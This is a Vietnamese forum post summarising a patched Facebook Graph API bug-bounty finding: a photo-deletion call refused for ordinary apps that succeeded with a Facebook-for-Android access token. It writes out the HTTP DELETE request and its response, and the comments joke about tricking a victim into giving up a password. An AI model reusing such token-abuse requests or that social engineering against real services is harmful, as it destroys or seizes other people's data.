30/09/2018, 16:29

[English] Facebook thưởng 12500 USD cho người tìm ra cách xóa album của người khác

Tóm tắt: Graph API không cho phép developer xóa hình của người khác, những hình và album được public ra bên ngoài.

Anh này thử xóa, và nhận được thông báo lỗi

Response :-
{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Nhưng thông báo lỗi lại nó là ứng dụng này không có khả năng sử dụng API call này. Suy ra là có ứng dụng khác có thể gọi API. Anh này thử với android mobile thì được

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>

Response :-
true

Report và lãnh tiền thôi.


Blog: http://www.7xter.com/2015/02/how-i-hacked-your-facebook-photos.html

Video:

Bằng chứng:

*grab popcorn* viết 18:30 ngày 30/09/2018

‘3’ kết bạn victim.
Pm này nỉ xin pass victim
Vô nick victim. Xóa hình và report cho fb

Mai Chân Chính viết 18:44 ngày 30/09/2018

trời anh drgnz Drgn quá đạo/ xin song 50%
12500/2 lá lá la

*grab popcorn* viết 18:38 ngày 30/09/2018

Hợp tác rồi chia 2 như @maichanchinhls đỡ mang họa vào thân :v
6250 cũng nhiều r =))))

buithaiminh viết 18:30 ngày 30/09/2018

Đệt… Có thời gian mình nghịch Graph API suốt mấy tháng liền mà không thử làm vụ này nhỉ. Tiền dễ kiếm ghê

Nguyễn Minh Dũng viết 18:42 ngày 30/09/2018

hehe, ăn thua hên xui. Nhiều khi nó nghĩ chơi chơi mà cuối cùng lại làm được. Cái lỗi này đâu khó để exploit đâu. Đùng một phát có 266 triệu ăn tết

Nguyễn Minh Dũng viết 18:32 ngày 30/09/2018

I moved 4 posts to an existing topic: Off-topics will be moved here

Bài liên quan
0